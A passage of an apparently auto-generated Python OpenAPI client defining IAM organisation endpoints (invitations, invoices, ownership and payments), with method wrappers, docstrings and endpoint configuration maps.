kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invitation_id'] = \
invitation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_delete = _Endpoint(
settings={
'response_type': None,
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation/{invitationId}',
'operation_id': 'iam_organisation_invitation_delete',
'http_method': 'DELETE',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invitation_id',
],
'required': [
'organisation_id',
'invitation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invitation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invitation_id': 'invitationId',
},
'location_map': {
'organisation_id': 'path',
'invitation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invitation_delete
)
def __iam_organisation_invitation_get(
self,
organisation_id,
invitation_id,
**kwargs
):
"""Get iam/organisation.invitation # noqa: E501
Get iam/organisation.invitation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_get(organisation_id, invitation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invitation_id (str): invitationId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Invitation
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invitation_id'] = \
invitation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_get = _Endpoint(
settings={
'response_type': (Invitation,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation/{invitationId}',
'operation_id': 'iam_organisation_invitation_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invitation_id',
],
'required': [
'organisation_id',
'invitation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invitation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invitation_id': 'invitationId',
},
'location_map': {
'organisation_id': 'path',
'invitation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invitation_get
)
def __iam_organisation_invitation_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.invitation # noqa: E501
List iam/organisation.invitation # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invitation_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
resource (str): resource. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Invitation]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invitation_list = _Endpoint(
settings={
'response_type': ([Invitation],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invitation',
'operation_id': 'iam_organisation_invitation_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'resource',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'resource':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'resource': 'resource',
},
'location_map': {
'organisation_id': 'path',
'resource': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invitation_list
)
def __iam_organisation_invoice_download(
self,
organisation_id,
invoice_id,
**kwargs
):
"""Download iam/organisation.invoice # noqa: E501
action download # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invoice_download(organisation_id, invoice_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invoice_id (str): invoiceId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
file_type
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invoice_id'] = \
invoice_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invoice_download = _Endpoint(
settings={
'response_type': (file_type,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invoice/{invoiceId}/actions/download',
'operation_id': 'iam_organisation_invoice_download',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invoice_id',
],
'required': [
'organisation_id',
'invoice_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invoice_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invoice_id': 'invoiceId',
},
'location_map': {
'organisation_id': 'path',
'invoice_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/pdf',
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invoice_download
)
def __iam_organisation_invoice_get(
self,
organisation_id,
invoice_id,
**kwargs
):
"""Get iam/organisation.invoice # noqa: E501
Get iam/organisation.invoice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invoice_get(organisation_id, invoice_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
invoice_id (str): invoiceId
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
Invoice
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
kwargs['invoice_id'] = \
invoice_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invoice_get = _Endpoint(
settings={
'response_type': (Invoice,),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invoice/{invoiceId}',
'operation_id': 'iam_organisation_invoice_get',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
'invoice_id',
],
'required': [
'organisation_id',
'invoice_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
'invoice_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
'invoice_id': 'invoiceId',
},
'location_map': {
'organisation_id': 'path',
'invoice_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invoice_get
)
def __iam_organisation_invoice_list(
self,
organisation_id,
**kwargs
):
"""List iam/organisation.invoice # noqa: E501
List iam/organisation.invoice # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.iam_organisation_invoice_list(organisation_id, async_req=True)
>>> result = thread.get()
Args:
organisation_id (str): Organisation Id
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
[Invoice]
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['organisation_id'] = \
organisation_id
return self.call_with_http_info(**kwargs)
self.iam_organisation_invoice_list = _Endpoint(
settings={
'response_type': ([Invoice],),
'auth': [
'BearerAuth'
],
'endpoint_path': '/iam/organisation/{organisationId}/invoice',
'operation_id': 'iam_organisation_invoice_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'organisation_id',
],
'required': [
'organisation_id',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'organisation_id':
(str,),
},
'attribute_map': {
'organisation_id': 'organisationId',
},
'location_map': {
'organisation_id': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__iam_organisation_invoice_list
)
def __iam_organisation_list(
        self,
        **kwargs
):
    """List iam/organisation  # noqa: E501

    List organisation  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_list(async_req=True)
    >>> result = thread.get()

    Keyword Args:
        name (str): Filter by name. [optional]
        billing_company (str): Filter by billing.company. [optional]
        limit (float): Filter by $limit. [optional]
        active (bool): Filter by active. [optional] if omitted the server will use the default value of False
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [Organisation]
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    return self.call_with_http_info(**kwargs)
self.iam_organisation_list = _Endpoint(
    settings={
        'response_type': ([Organisation],),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation',
        'operation_id': 'iam_organisation_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['name', 'billing_company', 'limit', 'active'],
        'required': [],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'name': (str,),
            'billing_company': (str,),
            'limit': (float,),
            'active': (bool,),
        },
        'attribute_map': {
            'name': 'name',
            'billing_company': 'billing.company',
            'limit': '$limit',
            'active': 'active',
        },
        'location_map': {
            'name': 'query',
            'billing_company': 'query',
            'limit': 'query',
            'active': 'query',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_list,
)
def __iam_organisation_ownership_create(
        self,
        organisation_id,
        iam_organisation_ownership_create,
        **kwargs
):
    """Create iam/organisation.ownership  # noqa: E501

    Create iam/organisation.ownership  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_ownership_create(organisation_id, iam_organisation_ownership_create, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        iam_organisation_ownership_create (IamOrganisationOwnershipCreate):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Organisation
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['iam_organisation_ownership_create'] = iam_organisation_ownership_create
    return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_create = _Endpoint(
    settings={
        'response_type': (Organisation,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/ownership',
        'operation_id': 'iam_organisation_ownership_create',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'iam_organisation_ownership_create'],
        'required': ['organisation_id', 'iam_organisation_ownership_create'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'iam_organisation_ownership_create': (IamOrganisationOwnershipCreate,),
        },
        'attribute_map': {'organisation_id': 'organisationId'},
        'location_map': {
            'organisation_id': 'path',
            'iam_organisation_ownership_create': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__iam_organisation_ownership_create,
)
def __iam_organisation_ownership_delete(
        self,
        organisation_id,
        ownership_id,
        **kwargs
):
    """Delete iam/organisation.ownership  # noqa: E501

    Delete iam/organisation.ownership  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_ownership_delete(organisation_id, ownership_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        ownership_id (str): ownershipId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        None
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['ownership_id'] = ownership_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_delete = _Endpoint(
    settings={
        'response_type': None,
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/ownership/{ownershipId}',
        'operation_id': 'iam_organisation_ownership_delete',
        'http_method': 'DELETE',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'ownership_id'],
        'required': ['organisation_id', 'ownership_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'ownership_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'ownership_id': 'ownershipId',
        },
        'location_map': {
            'organisation_id': 'path',
            'ownership_id': 'path',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_ownership_delete,
)
def __iam_organisation_ownership_get(
        self,
        organisation_id,
        ownership_id,
        **kwargs
):
    """Get iam/organisation.ownership  # noqa: E501

    Get iam/organisation.ownership  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_ownership_get(organisation_id, ownership_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        ownership_id (str): ownershipId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Ownership
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['ownership_id'] = ownership_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_get = _Endpoint(
    settings={
        'response_type': (Ownership,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/ownership/{ownershipId}',
        'operation_id': 'iam_organisation_ownership_get',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'ownership_id'],
        'required': ['organisation_id', 'ownership_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'ownership_id': (str,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'ownership_id': 'ownershipId',
        },
        'location_map': {
            'organisation_id': 'path',
            'ownership_id': 'path',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_ownership_get,
)
def __iam_organisation_ownership_list(
        self,
        organisation_id,
        **kwargs
):
    """List iam/organisation.ownership  # noqa: E501

    List iam/organisation.ownership  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_ownership_list(organisation_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        [Ownership]
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_ownership_list = _Endpoint(
    settings={
        'response_type': ([Ownership],),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/ownership',
        'operation_id': 'iam_organisation_ownership_list',
        'http_method': 'GET',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id'],
        'required': ['organisation_id'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {'organisation_id': (str,)},
        'attribute_map': {'organisation_id': 'organisationId'},
        'location_map': {'organisation_id': 'path'},
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': [],
    },
    api_client=api_client,
    callable=__iam_organisation_ownership_list,
)
def __iam_organisation_payment_allocate(
        self,
        organisation_id,
        payment_id,
        iam_organisation_payment_allocate,
        **kwargs
):
    """Allocate iam/organisation.payment  # noqa: E501

    action allocate  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_payment_allocate(organisation_id, payment_id, iam_organisation_payment_allocate, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        payment_id (str): paymentId
        iam_organisation_payment_allocate (IamOrganisationPaymentAllocate):

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Payment
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['payment_id'] = payment_id
    kwargs['iam_organisation_payment_allocate'] = iam_organisation_payment_allocate
    return self.call_with_http_info(**kwargs)
self.iam_organisation_payment_allocate = _Endpoint(
    settings={
        'response_type': (Payment,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/payment/{paymentId}/actions/allocate',
        'operation_id': 'iam_organisation_payment_allocate',
        'http_method': 'POST',
        'servers': None,
    },
    params_map={
        'all': ['organisation_id', 'payment_id', 'iam_organisation_payment_allocate'],
        'required': ['organisation_id', 'payment_id', 'iam_organisation_payment_allocate'],
        'nullable': [],
        'enum': [],
        'validation': [],
    },
    root_map={
        'validations': {},
        'allowed_values': {},
        'openapi_types': {
            'organisation_id': (str,),
            'payment_id': (str,),
            'iam_organisation_payment_allocate': (IamOrganisationPaymentAllocate,),
        },
        'attribute_map': {
            'organisation_id': 'organisationId',
            'payment_id': 'paymentId',
        },
        'location_map': {
            'organisation_id': 'path',
            'payment_id': 'path',
            'iam_organisation_payment_allocate': 'body',
        },
        'collection_format_map': {},
    },
    headers_map={
        'accept': ['application/json'],
        'content_type': ['application/json'],
    },
    api_client=api_client,
    callable=__iam_organisation_payment_allocate,
)
def __iam_organisation_payment_get(
        self,
        organisation_id,
        payment_id,
        **kwargs
):
    """Get iam/organisation.payment  # noqa: E501

    Get iam/organisation.payment  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.iam_organisation_payment_get(organisation_id, payment_id, async_req=True)
    >>> result = thread.get()

    Args:
        organisation_id (str): Organisation Id
        payment_id (str): paymentId

    Keyword Args:
        _return_http_data_only (bool): response data without head status
            code and headers. Default is True.
        _preload_content (bool): if False, the urllib3.HTTPResponse object
            will be returned without reading/decoding response data.
            Default is True.
        _request_timeout (float/tuple): timeout setting for this request. If one
            number provided, it will be total request timeout. It can also
            be a pair (tuple) of (connection, read) timeouts.
            Default is None.
        _check_input_type (bool): specifies if type checking
            should be done on the data sent to the server.
            Default is True.
        _check_return_type (bool): specifies if type checking
            should be done on the data received from the server.
            Default is True.
        _host_index (int/None): specifies the index of the server
            that we want to use.
            Default is read from the configuration.
        async_req (bool): execute request asynchronously

    Returns:
        Payment
        If the method is called asynchronously, returns the request
        thread.
    """
    # Fill in transport defaults without clobbering caller-supplied values.
    kwargs.setdefault('async_req', False)
    kwargs.setdefault('_return_http_data_only', True)
    kwargs.setdefault('_preload_content', True)
    kwargs.setdefault('_request_timeout', None)
    kwargs.setdefault('_check_input_type', True)
    kwargs.setdefault('_check_return_type', True)
    kwargs.setdefault('_host_index')
    kwargs['organisation_id'] = organisation_id
    kwargs['payment_id'] = payment_id
    return self.call_with_http_info(**kwargs)
self.iam_organisation_payment_get = _Endpoint(
    settings={
        'response_type': (Payment,),
        'auth': ['BearerAuth'],
        'endpoint_path': '/iam/organisation/{organisationId}/payment/{paymentId}',
        'operation_id': 'iam_organisation_payment_get',
        'http_method': 'GET',
        'servers': None,
